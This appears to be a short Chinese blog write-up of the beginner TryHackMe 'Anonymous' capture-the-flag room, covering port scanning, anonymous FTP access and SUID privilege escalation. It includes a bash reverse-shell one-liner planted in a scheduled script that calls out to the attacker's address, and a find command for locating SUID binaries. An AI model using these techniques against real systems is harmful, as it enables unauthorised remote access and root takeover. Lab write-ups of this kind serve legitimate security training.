TryHackMe-Anonymous

发布于 2022-11-19  261 次阅读


简介:

尝试获得这两个标志!扎根机器并证明您对基本原理的理解!这是一个适合初学者的虚拟机。获取这两个标志需要一些 Linux 和特权升级方法的基本知识。

房间链接:

https://tryhackme.com/room/anonymous

问题:

挑战开始:

首先扫描端口
发现开启了4个端口

首先看下smb

smbclient -L 10.10.243.225

发现有一个共享文件夹,链接下载本地,发现只是普通的图片,并没有什么信息

接着查看21端口的ftp,第一次连接随便输入了个用户名,提示只能匿名登陆,于是第二次连接成功链接,发现有一个文件夹

进入文件夹把文件夹里面的文件下载下来,发现是一个脚本和一个日志文件还有一个txt

并且在不停的定时执行
这里我们在脚本里面加入反弹shell的命令

/bin/bash -i > /dev/tcp/10.10.170.192/8888 0<&1 2>&1

再将本地的脚本上传覆盖上去

本地打开监听,过了一会成功收到shell,找到flag

接着尝试suid提权
发现一个有趣的程序存在suid

find / -user root -perm -4000 -exec ls -ldb {} \;

直接根据方法利用

成功提权,获取root flag

答案

届ける言葉を今は育ててる
最后更新于 2022-11-19